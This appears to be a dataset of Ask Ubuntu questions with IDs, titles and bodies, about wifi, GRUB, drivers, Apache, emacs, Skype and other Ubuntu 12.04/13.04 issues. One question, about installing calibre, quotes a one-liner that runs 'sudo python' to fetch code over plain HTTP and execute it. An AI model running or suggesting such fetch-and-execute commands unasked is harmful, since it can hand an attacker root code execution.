338114	wifi not working with 13.04	i have a dvd with ubuntu on it , but as a test i wanted to see the product and it wo n't connect with my laptop 's wifi . do i need to configure something for it to work ? my gateway laptop however , connects with vista to the internet .
338116	can i use grub only for windows 7 ?	i installed ubuntu and now i want to get rid of it because i hardly use it . i deleted the ubuntu partitions , but that also broke grub . i reinstalled ubuntu and then repaired grub , but i still want to get rid of ubuntu . i do n't have a cd burner , so i cant create a windows rescue disk . i want to know if i can delete ubuntu partitions and reinstall grub via live usb to still be able to boot into windows 7 .
338117	removing windows xp and installing ubuntu 12.04	i have installed ubuntu 12.04 on my laptop . since i hate windows , i would also like to install ubuntu on my desktop . it has two 1tb drives in ntfs ( one drive is 1tb partition and other 1tb is c : 500gb partition for windows xp and f : 500gb for data and programs ) and i have searched the faq and did not come up with an answer if i would lose my data on ntfs drives or if they would mount . i am a beginner to ubuntu and do not know how to use the terminal , but i have been using windows since early dos . i am 63 and my memory is slipping . i just want bill gates out of my computers . i have a windows tech charging me now to see why my copy of xp pro is saying it may be counterfeit , and i know that it is not . $ 99.00 and he will likely tell me i will have to buy a new key at some price . `` love ubuntu '' . also is there any place that i can get a complete list of commands for use in the terminal for ubuntu 12.04 . thanks for your kind understanding .
338119	asus motherboard - which graphics-drivers ?	i 've recently purchased an old but working mobo , asus p5s800-vm/s . the onboard graphics are displaying low-res `` safety mode '' type graphics on the monitor . i understand from the guy i bought it from that it will need extra drivers to deliver normal resolution output . details : vga - integrated sis real 256e graphics chipset sis 671fx northbridge sis 964 southbridge cpu - pentium 4 3ghz with hyperthreading technology . so will i need to find drivers for both the sis real 256e and the sis 671fx ? or just one or the other ? does anyone know where i can download these things because there 's not much in the way of linux graphic support on the section of the asus website for this board . thanks for any help you can offer . before , i 've simply installed ubuntu on a system and it just worked . its the first time i 've encountered this situation so i 'm a bit bamboozled .
338120	9.04 only on dell inspiron b120	i 've been trying to install ubuntu on my 7 year old dell inspiron b120 with very limited success . i tried installing multiple versions unsuccessfully until i worked my way down to 9.04 . i 've gotten it installed and running as well as i can with the limited support i can access . why dell wo n't even run any new versions that i 've tried from a memory stick . it seems to reach a certain point and just stops opening . it stops at the colorful splash screen and that 's it . no icons , labels , nothing . i 'm assume my problem is an outdated laptop , but any input is appreciated . cpu : intel celeron m 1.4 ghz fsb : 400 mhz ram : 256 mb
338127	cisco web ex installation	i have a cisco web ex license and want to use it on my ubuntu machine , i downloaded java to install as recommended but i can not seem to get it to install which would allow me to run my online meetings . help please thanks .
338128	extremely unstable wifi after a recent update	i 've using dell xps13 ( intel centrinos advanced-n 6235 ) for half a year , and the wifi works fine ( with 11n_disable=1 ) . however , after a recent apt-get upgrade ( i do n't remember what was updated , but it was a quick one ) , my wifi becomes basically unusable . it connects sucessfully , but freezes roughly after 10 seconds and will come back to normal after 10-20 seconds , and then freezes after 10 seconds again , and so on . any idea what is going on ? thanks ! by the way , it should n't a problem with the wifi signal , since another laptop with windows 7 has no problem at all .
338134	how do i load the kernel from grub ?	i am having problems booting my version of ubuntu 13.04 . whenever i tell it to boot it says : error : you need to load the kernel first . i do n't know if i installed it wrong or it corrupted or something , if you would help me i 'd be very grateful .
338135	stop emacs server being killed on logout	i 'd like to run an emacs server in the background and have it persist after logout . i do not want to start it a system service since it 's not a system service . a more practical reason is that i 'm not the only one using this computer . i 've tried running emacs -- daemon from a graphical terminal , and running emacs-client -c -- alternate-editor `` '' from a graphical terminal and from the unity launcher , but in all cases the emacs server process is killed on logout . this seems to be a bug to me . for instance , my screen session is not killed on logout . i thought i might ask about this here before filing a bug report . there is this bug https : //bugs.launchpad.net/ubuntu/+source/emacs-defaults/+bug/1079820 which seems to suggest it is desirable to kill the emacs server on logout . i disagree : it 's a daemon and should be launchable from within unity and not killed on logout . the bug report also suggests that the problem does not exist in emacs24 so is not an issue . i 'm running ubuntu 12.04 with emacs23 and ca n't upgrade right now and so it is an issue for me . the workaround i have found is to ctrl-alt-f1 and run the daemon from the terminal there . then unity has no knowledge of the process and does n't kill it on logout . i 'd prefer not to have to do this however . does anyone know how to prevent the emacs -- daemon process being killed when i logout ?
338137	how to install ubuntu in usb to boot in a mac system ?	hello everyone i have a quick question . i 'm interested in ubuntu and would like to put ubuntu on a 32gb usb drive i have so i can boot it on my mac 10.8.4 . i do n't have room on my local drive at the moment so it would need to be self contained on the usb drive itself . would someone be willing to help me with this if possible ? i 've seen similar questions but not with the whole of ubuntu on the usb itself .
338151	mce remote no response with mythtv or irw	i 've installed mythbuntu 12.04.2 on a new asus h87i plus i5 , mythtv works fine but i 'm unable to get a ( pinicale ) pctv mce remote to work . i have the same mythbuntu running on an old dell optiplex and the remote works on that installation , but not on the new asus h87i . i 've spent a lot of time surfing trying to find a solution . the system appears to see the usb receiver , but when i run irw , there is no output . below are what i 've are the most asked commands to run with similar problems . any help would be greatly appreciated , i really want to dump the old optiplex . $ uname -a linux mythtv-1 3.5.0-39-generic # 60~precise1-ubuntu smp wed aug 14 15:38:41 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ cat /etc/lirc/lircd.conf configuration for the windows media center transceivers/remotes ( all ) remote : include `` /usr/share/lirc/remotes/mceusb/lircd.conf.mceusb '' $ lsmod | grep lirc ir_lirc_codec 12860 0 rc_core 26423 11 ir_lirc_codec , ir_mce_kbd_decoder , ir_sanyo_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , mceusb lirc_dev 19205 1 ir_lirc_codec $ lsusb bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 003 device 002 : id 046d : c521 logitech , inc. cordless mouse receiver bus 003 device 004 : id 2304:0225 pinnacle systems , inc . remote kit infrared transceiver bus 003 device 006 : id 13fe:1e00 kingston technology company inc . flash drive 2 gb [ icidu 2 gb ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub $ ls /dev |grep lirc lirc0 lircd $ uname -r & & lircd -v 3.5.0-39-generic lircd 0.9.0 $ lsmod | grep mceusb mceusb 18152 0 rc_core 26423 11 ir_lirc_codec , ir_mce_kbd_decoder , ir_sanyo_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , mceusb $ cat /sys/class/rc/rc1/protocols rc-5 nec rc-6 jvc sony sanyo mce_kbd [ lirc ] $ ls /dev/lirc* /dev/lirc0 /dev/lircd i 've installed windows 7 and tested the remote with media center and it works fine , so there must be something i 'm missing . the system recognizes the receiver , but does n't see the signals . ~ $ sudo evtest /dev/input/event14 input driver version is 1.0.1 input device id : bus 0x0 vendor 0x0 product 0x0 version 0x0 input device name : `` mce ir keyboard/mouse ( mceusb ) '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 1 ( key_esc ) event code 2 ( key_1 ) event code 3 ( key_2 ) event code 4 ( key_3 ) event code 5 ( key_4 ) event code 6 ( key_5 ) event code 7 ( key_6 ) event code 8 ( key_7 ) event code 9 ( key_8 ) event code 10 ( key_9 ) event code 11 ( key_0 ) event code 12 ( key_minus ) event code 13 ( key_equal ) event code 14 ( key_backspace ) event code 15 ( key_tab ) event code 16 ( key_q ) event code 17 ( key_w ) event code 18 ( key_e ) event code 19 ( key_r ) event code 20 ( key_t ) event code 21 ( key_y ) event code 22 ( key_u ) event code 23 ( key_i ) event code 24 ( key_o ) event code 25 ( key_p ) event code 26 ( key_leftbrace ) event code 27 ( key_rightbrace ) event code 28 ( key_enter ) event code 29 ( key_leftctrl ) event code 30 ( key_a ) event code 31 ( key_s ) event code 32 ( key_d ) event code 33 ( key_f ) event code 34 ( key_g ) event code 35 ( key_h ) event code 36 ( key_j ) event code 37 ( key_k ) event code 38 ( key_l ) event code 39 ( key_semicolon ) event code 40 ( key_apostrophe ) event code 41 ( key_grave ) event code 42 ( key_leftshift ) event code 43 ( key_backslash ) event code 44 ( key_z ) event code 45 ( key_x ) event code 46 ( key_c ) event code 47 ( key_v ) event code 48 ( key_b ) event code 49 ( key_n ) event code 50 ( key_m ) event code 51 ( key_comma ) event code 52 ( key_dot ) event code 53 ( key_slash ) event code 54 ( key_rightshift ) event code 55 ( key_kpasterisk ) event code 56 ( key_leftalt ) event code 57 ( key_space ) event code 58 ( key_capslock ) event code 59 ( key_f1 ) event code 60 ( key_f2 ) event code 61 ( key_f3 ) event code 62 ( key_f4 ) event code 63 ( key_f5 ) event code 64 ( key_f6 ) event code 65 ( key_f7 ) event code 66 ( key_f8 ) event code 67 ( key_f9 ) event code 68 ( key_f10 ) event code 69 ( key_numlock ) event code 70 ( key_scrolllock ) event code 71 ( key_kp7 ) event code 72 ( key_kp8 ) event code 73 ( key_kp9 ) event code 74 ( key_kpminus ) event code 75 ( key_kp4 ) event code 76 ( key_kp5 ) event code 77 ( key_kp6 ) event code 78 ( key_kpplus ) event code 79 ( key_kp1 ) event code 80 ( key_kp2 ) event code 81 ( key_kp3 ) event code 82 ( key_kp0 ) event code 83 ( key_kpdot ) event code 85 ( key_zenkakuhankaku ) event code 86 ( key_102nd ) event code 87 ( key_f11 ) event code 88 ( key_f12 ) event code 89 ( key_ro ) event code 90 ( key_katakana ) event code 91 ( key_hiragana ) event code 92 ( key_henkan ) event code 93 ( key_katakanahiragana ) event code 94 ( key_muhenkan ) event code 95 ( key_kpjpcomma ) event code 96 ( key_kpenter ) event code 97 ( key_rightctrl ) event code 98 ( key_kpslash ) event code 99 ( key_sysrq ) event code 100 ( key_rightalt ) event code 102 ( key_home ) event code 103 ( key_up ) event code 104 ( key_pageup ) event code 105 ( key_left ) event code 106 ( key_right ) event code 107 ( key_end ) event code 108 ( key_down ) event code 109 ( key_pagedown ) event code 110 ( key_insert ) event code 111 ( key_delete ) event code 113 ( key_mute ) event code 114 ( key_volumedown ) event code 115 ( key_volumeup ) event code 116 ( key_power ) event code 117 ( key_kpequal ) event code 119 ( key_pause ) event code 121 ( key_kpcomma ) event code 122 ( key_hanguel ) event code 123 ( key_hanja ) event code 124 ( key_yen ) event code 125 ( key_leftmeta ) event code 126 ( key_rightmeta ) event code 127 ( key_compose ) event code 128 ( key_stop ) event code 129 ( key_again ) event code 130 ( key_props ) event code 131 ( key_undo ) event code 132 ( key_front ) event code 133 ( key_copy ) event code 134 ( key_open ) event code 135 ( key_paste ) event code 136 ( key_find ) event code 137 ( key_cut ) event code 138 ( key_help ) event code 140 ( key_calc ) event code 142 ( key_sleep ) event code 150 ( key_www ) event code 152 ( key_screenlock ) event code 158 ( key_back ) event code 159 ( key_forward ) event code 161 ( key_ejectcd ) event code 163 ( key_nextsong ) event code 164 ( key_playpause ) event code 165 ( key_previoussong ) event code 166 ( key_stopcd ) event code 173 ( key_refresh ) event code 176 ( key_edit ) event code 177 ( key_scrollup ) event code 178 ( key_scrolldown ) event code 183 ( key_f13 ) event code 184 ( key_f14 ) event code 185 ( key_f15 ) event code 186 ( key_f16 ) event code 187 ( key_f17 ) event code 188 ( key_f18 ) event code 189 ( key_f19 ) event code 190 ( key_f20 ) event code 191 ( key_f21 ) event code 192 ( key_f22 ) event code 193 ( key_f23 ) event code 194 ( key_f24 ) event code 272 ( btn_left ) event code 273 ( btn_right ) event type 2 ( ev_rel ) event code 0 ( rel_x ) event code 1 ( rel_y ) event type 4 ( ev_msc ) event code 4 ( msc_scan ) event type 20 ( ev_rep ) testing ... ( interrupt to exit ) ( no key presses were recognized )
338153	502 no server or forwarder data received when using privoxy	i 'm running privoxy 3.0.19 on xubuntu 12.04 64-bit and from time to time i get this error message when trying to access certain webpages . it 's happening a little less than half the time . for example , when i try to access http : //www.thetangledweb.net i get this error message every time . it just started happening this afternoon . earlier today i was able to access the website just fine but now , for whatever reason , i 'm getting this error message . i 've looked in the log file but it does n't show anything regarding this particular website . i 'm not sure what else to do . any thoughts or ideas ? thank you .
338154	broadcom wireless wo n't install at all ! 12.04.3 ubuntu desktop	broadcom bcm43227 802.11b/g/ ifconfig shows only eth0 and lo . no wlan0 shows . i need this problem fixed soon , because i need to be able to take this laptop to do my work . i tried all of the options on this : how to install broadcom wireless drivers i 've installed kernel source , and tried reinstalling the b43 , but none of it takes effect . i ca n't be sure , but i 've probably tried it with turning my laptop on for wifi . it has a button to turn it on and off , but it should auto enable with `` enable networking '' . but , i still ca n't install any drivers , nor can i get access to my wifi . my laptop is right next to the router by verizon . it is fast enough and i have accessed wifi through my windows os . but i ca n't get it to work on this os . i 'm sorry , i 'm really confused about everything . i 'm also pretty new to linux .
338157	how can i find out the % of australians that use ubuntu ?	i 'm researching how quickly australians adopt open source technology , where can i find statistics that show global adoption rates for ubuntu ?
338162	virtualbox and header updates	i am using ubuntu 12.04 lts and virtualbox 4.1.12 the last 3 ( header ) updates have resulted in virtualbox not working immediately after the header update . i searched this forum and found this discussion . using vedvals answer of dec 1 , '12 the situation was resolved . does anyone have a suggestion as to how overcome this issue , so that after the headers are updated virtualbox will just function ? thank you .
338172	how to install calibre on ubuntu 12.04	im trying to install calibre e-book manager on my computer , i 'm a newbie to linux and i dont know where the `` installation directory '' is ... .here are the commands that they have in order to install it ... sudo python -c `` import sys ; py3 = sys.version_info [ 0 ] > 2 ; u = __import__ ( 'urllib.request ' if py3 else 'urllib ' , fromlist=1 ) ; exec ( u.urlopen ( 'http : //status.calibre-ebook.com/linux_installer ' ) .read ( ) ) ; main ( ) '' '' one can also avoid having the installer script ask for the installation directory by specifying it in the install command itself , as shown below : '' sudo python -c `` import sys ; py3 = sys.version_info [ 0 ] > 2 ; u = __import__ ( 'urllib.request ' if py3 else 'urllib ' , fromlist=1 ) ; exec ( u.urlopen ( 'http : //status.calibre-ebook.com/linux_installer ' ) .read ( ) ) ; main ( install_dir='/path/to/your/library ' ) '' source
338173	springrts engine stuck at version 91 , i need 94.1 to play online . lobby version stuck 0.168 , 0.169 is current	i 'll walk you through what i did in hopes that that can maybe elucidate what i 'm doing wrong . i went to the ubuntu software center and downloaded both the spring engine and the lobby client , and downloaded some maps and games to play . one of those games was the rts zero-k , which can be found here : http : //zero-k.info i used the guide found here : http : //springrts.com/wiki/ubuntu_install to update my spring once it installed . to make a long story short , no matter how many times i try to update , either by deleting and re-adding the repo links to the `` other software '' tab , or manually through apt-get update , it always says my spring is at the current version . unfortunately , that 's not the case . according to spring itself , it says its version is 91.0 . the current stable build is 94.1 , and one needs the latest build in order to play online , which is what i want to do . i attempted to compile it myself using the guide found here : http : //zero-k.info/wiki/download which got zero-k working , but then i realized i was still stuck at version 91.0 . i replaced the relevant links with version 94.1 and repeated the process . then i got this error when using the make command when trying to compile the source : [ 15 % ] building cxx object ai/skirmish/kaik/cmakefiles/kaik.dir/aiexport.cpp.o c++ : error : stuff/spring_94.1/rts/lib/lua/include/ : no such file or directory c++ : error : stuff/spring_94.1/rts/lib/lua/src/ : no such file or directory c++ : error : stuff/spring_94.1/rts/lib/streflop/ : no such file or directory make [ 2 ] : *** [ ai/skirmish/kaik/cmakefiles/kaik.dir/aiexport.cpp.o ] error 1 make [ 1 ] : *** [ ai/skirmish/kaik/cmakefiles/kaik.dir/all ] error 2 make : *** [ all ] error 2 it was recommended by members of the springrts community to try using cmake-gui , and i did , though i 've never used that particular command before -- and so i 'd be willing to work my way through that , though i would need some help . however , another forum member told me that the ubuntu software repos have spring 94 somewhere in them , and so i should n't have to compile the source for myself . however , like i said above , when i remove and re-add the spring ppa , it does nothing . the engine still says version 91 , and in the software tab , there is no option to `` reload '' or `` update '' the packages as suggested by the `` ubuntu install '' guide linked above . so , that 's where i 'm stuck . i 'm sorry that that question is a bit of a read , but hopefully there 's enough information there that more knowledgeable users can figure out where i went wrong and what we can do about it . thanks so much in advance for all your help . : )
338178	how do i install 13.04 alongside windows on an intel raid 5 ?	whenever i try to install ubuntu i run into issues . all the live cd 's do n't display the intel raid 5 and show multiple drives . when i tried the 12.04 alternative , and the raring minimal iso . the raid does not show the proper partitions . while the proper partitions look like this . is there any way to solve this issue without recreating the raid ?
338179	why is n't my usb keyboard working on my newly installed ubuntu 13.04 system ?	my usb keyboard is not working on my newly installed ubuntu 13.04. but it works in grub menu . this is the output of dmesg | tail : this issue is related with an old via mainboard : unspecified p4m266-pm12-tl chipset : via p4m266 ( vt8751 ) i had to use a ps/2 keyboard . now i am happy to use lubuntu . thanks
338186	how can i install kobo desktop on ubuntu ?	i bought a kobo ebook reader and would now like to set it up with kobo desktop . how do i install this software on ubuntu , though ? the homepage does n't seem to offer any linux version .
338192	how to boot from windows 7 installation usb and install it after ubuntu ?	i have ubuntu 13.04 installed on my hp pavilion pc , and i am able to boot from ubuntu live usb , but when i try to install windows 7 from usb my computer boots to ubuntu . my windows installation usb works fine to install windows in virtualbox . i already have windows 7 installed inside virtualbox using my windows installation usb . any help and advice to solve the issue would be highly appreciated ,
338195	how can i install persistent ubuntu 13.04 ?	i ca n't install persistent ubuntu 13.04 on my 4gb using universal usb installer . it acts as live usb not persistent usb it gives me setup every boot . i used to install persistent ubuntu using universal usb installer
338196	ubuntu 12.04 nvidia drivers updates includes drivers for amd drivers ?	why is there amd drivers included in update manager in ubuntu 12.04 . here 's the screenshot . i 've installed nvidia drivers except these amd drivers . should i install them . and why would ubuntu allows you to install them .
338199	what is the difference between these 3 files . xorg.conf , xorg.conf.failsafe and xorg.conf.nvidia-xconfig-original	how do they differ . what are their functionality . i 'm new to ubuntu and i 'm using ubuntu 12.04lts . here are their contents . xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.88 ( buildmeister @ swio-display-x86-rhel47-14 ) wed mar 27 15:36:45 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection xorg.conf.failsafe section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection why is xorg.conf.nvidia-xconfig-original empty ? why does xorg.conf.failsafe lists vesa as driver ?
338202	more nvidia problems following upgrade	i 'm running ubuntu 12.04.3 on a toshiba satellite l745 . i 've been doing this happily for two years now but sporadically have nvidia-related problems following ubuntu updates . 24 hours ago i accepted all available updates and now i can not boot . i have fixed this problem before using advice on ask ubuntu pages such as : can i install extra drivers via the command prompt ? however , this time the computer will not respond to jockey-text commands ( dbus.exceptions ) and tells me nvidia current is already installed . i am unable to boot ubuntu after a couple of hours of trying and am getting frustrated . reboot attempts confirm the problem is nvidia based : `` the nvidia kernel module has 310.44 but this nvidia driver component has 304.88 ''
338205	clean unwanted files after an incomplete download , ubuntu 12.04.2	i am currently working on getting eclipse installed on ubuntu 12.04.2 on a live usb of 4gb with 3000mb as persistence . i used some commands like : $ sudo apt-get upgrade $ sudo apt-get install cmake $ sudo apt-get install iibgtk2.0-dev $ cmake -d cmake_build_type=release -d build_new_python_support=on -d make_install_prefix=/usr/local ./ $ make $ sudo apt-get install eclipse $ sudo apt-get install eclipse eclipse eclipse-cdt when i was in the process of completing `` sudo apt-get install eclipse '' , some error due to bad internet connection at that particular time and i had to stop the downloading and installing progress of eclipse and i think it must have used some big amount of my usb storage because , now when i try again it with stable internet connection , it is showing some error with `` no disk space '' and recommends me `` sudo apt-get update/upgrade '' and doing the same is also of no help . can someone please tell me a effective way of removing junk files like the one i mentioned above . thanks in advance .
338208	ca n't reach pc over network until it pings me	i have two ubuntu pc 's in my setup . pc a is wired into the home router . pc b is wireless . when i reboot pc a , i ca n't ping pc b until pc b pings pc a . after that it works just fine . also i think other network commands ( ssh , etc ) will make the host reachable also . after pc a reboots , a ping to pc b says 'destination host unreachable ' , but it can reach the internet and other pc 's on the router . any ideas on what to check ?
338210	broadcom sta wireless driver	when trying to activate the wireless driver , i get it could not be activated . it says to check the logs . i am a complete noobie to ubuntu and am generally trying to learn more about computers as i go . here is the log . any help would be extremely appreciated . my ethernet connection works fine , if that makes any difference . tail -f /var/log/jockey.log 2013-08-27 21:52:41,104 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:52:41,129 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:52:51,349 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:52:58,681 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-08-27 21:52:58,681 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-08-27 21:52:58,750 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:54:07,963 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:54:07,980 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 21:54:08,004 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 22:07:53,899 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 22:07:59,045 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-08-27 22:07:59,046 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-08-27 22:07:59,088 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 22:08:13,260 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 22:08:13,282 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-27 22:08:13,318 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710/m92 [ mobility radeon hd 4330/4350/4550 ] 02:00.1 audio device : advanced micro devices , inc. [ amd/ati ] rv710/730 hdmi audio [ radeon hd 4000 series ] 04:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) sudo lshw -c hardware lister ( lshw ) - b.02.15 usage : lshw [ -format ] [ -options ... ] lshw -version -version print program version ( b.02.15 ) format can be -html output hardware tree as html -xml output hardware tree as xml -short output hardware paths -businfo output bus information options can be -class class only show a certain class of hardware -c class same as '-class class' -c class same as '-class class' -disable test disable a test ( like pci , isapnp , cpuid , etc. ) -enable test enable a test ( like pci , isapnp , cpuid , etc. ) -quiet do n't display status -sanitize sanitize output ( remove sensitive information like serial numbers , etc . ) -numeric output numeric ids ( for pci , usb , etc . ) rfkill list all doesnt return anything . perhaps something here is the issue ? it is n't picking up and available connections . i have a hard block button which i do n't believe to be the problem on my laptop and have checked in boot settings to make sure wireless connections are enabled . lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise
338216	scrolling with two fingers does n't keep activated	when i activate the scrolling with two fingers in the touchpad options and i close the window , the option comes back to disabled . have tried many answers and solutions , but none of these worked . my laptop is a dell 5720 , and the output of xinput -- list is : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=14 [ slave keyboard ( 3 ) ]
338218	why am i getting `` permission denied : make_sock : could not bind to address '' when starting apache2 ?	i can stop it using /etc/init.d/apache2 stop but when i want to start it again using : /etc/init.d/apache2 start i get this error : starting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 13 ) permission denied : make_sock : could not bind to address [ : : ] :80 ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . [ fail ]
338229	installing and running .apk in android virtual emulator	he , i have downloaded android development tool ( adt ) and have setuped it . i have also created a virtual emulator . now i have to run/test/install downloaded .apk file in the emulator but dont know how to do it . please , suggest me a way to do this . the package directory map is as : home > > developer > > adt-bundle-linux-x86_64-20130729 ... . these path further contain two folder : sdk tools now i need yours help how and where to install and run the .apk file in the emulator .
338231	why does the url not resolve to the correct folder on the ubuntu12.10/apache2 server	i ca n't figure out why the url hello.apoio.co resolves to the var/www/ folder and not the var/www/hello.apoio.co folder i 'm sure it 's something simple but i ca n't see it ? i followed the official instructions to the letter . any help would be greatly appreciated here is the code from the virtual host file documentroot /var/www/hello.apoio.co/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/hello.apoio.co/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined
338233	how did this make skype work ?	i came across this solution here that worked for me , and i want to know how did it work and what did it do ? could anybody please explain ? open the terminal and type : gksudo gedit /etc/ld.so.conf.d/skype.conf paste the following line : /usr/lib/i386-linux-gnu/mesa/ run ldconfig in the terminal : sudo ldconfig -v
338234	how to solve this language downloading issue ?	i have a problem when i try to download another language by the system setting menu , i have this error message : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-fr_12.0+build1-0ubuntu0.12.04.1_amd64.deb 404 not found i have installed ubuntu 12.04 on an acer c710 running chrome os
338236	make exact copy of working server	i have working ubunutu 12.0.4 production server . want to copy it 's 650 gb hdd ( only 30-40 gb used , but partitions fit hdd totally ) to 500 gb hdd so that i can just replace hdd 's and turn on server again without time waste . after 0time of researching on google i found tool named dd . but it 's copying raw data of hdd 's and destination hdd must be exactly same size . what tool can you suggest for this reason ?
